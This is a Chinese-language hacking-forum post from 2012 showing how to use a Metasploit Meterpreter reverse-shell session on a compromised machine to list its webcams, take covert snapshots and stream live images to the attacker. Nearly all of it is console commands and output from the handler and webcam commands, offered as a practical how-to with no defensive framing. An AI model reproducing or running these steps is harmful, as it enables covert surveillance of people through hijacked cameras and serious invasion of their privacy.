切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
317 :MSF 和 摄像头[复制链接]
发表于 2012-10-13 00:14:20 | 显示全部楼层 |!read_mode!
取得了一个SHELL:
  1. msf  exploit(handler) > set LHOST 192.168.1.101
  2. LHOST => 192.168.1.101
  3. msf  exploit(handler) > exploit

  4. [*] Started reverse handler on 192.168.1.101:4444
  5. [*] Starting the payload handler...
  6. [*] Sending stage (752128 bytes) to 192.168.1.201
  7. [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.201:1216) at 2012-10-02 10:46:45 -0700

  8. meterpreter >
复制代码
探测摄像头驱动


  1. meterpreter > webcam_list
  2. 1:
复制代码
拍照 自动打开


  1. meterpreter > webcam_snap
  2. [*] Starting...
  3. [+] Got frame
  4. [*] Stopped
  5. Webcam shot saved to: /root/AWnSCDlm.jpeg
  6. meterpreter >
复制代码



如果有多个驱动用-i指定 例如:


  1. meterpreter > webcam_snap -i 1
复制代码
保存为HTML模式 并且每隔5秒刷新一次


  1. meterpreter > run webcam
  2. [*] Starting webcam 1:
  3. [*] View live stream at: ./webcam.htm
  4. [*] Image saved to : ./webcam.jpg
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 07:16

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部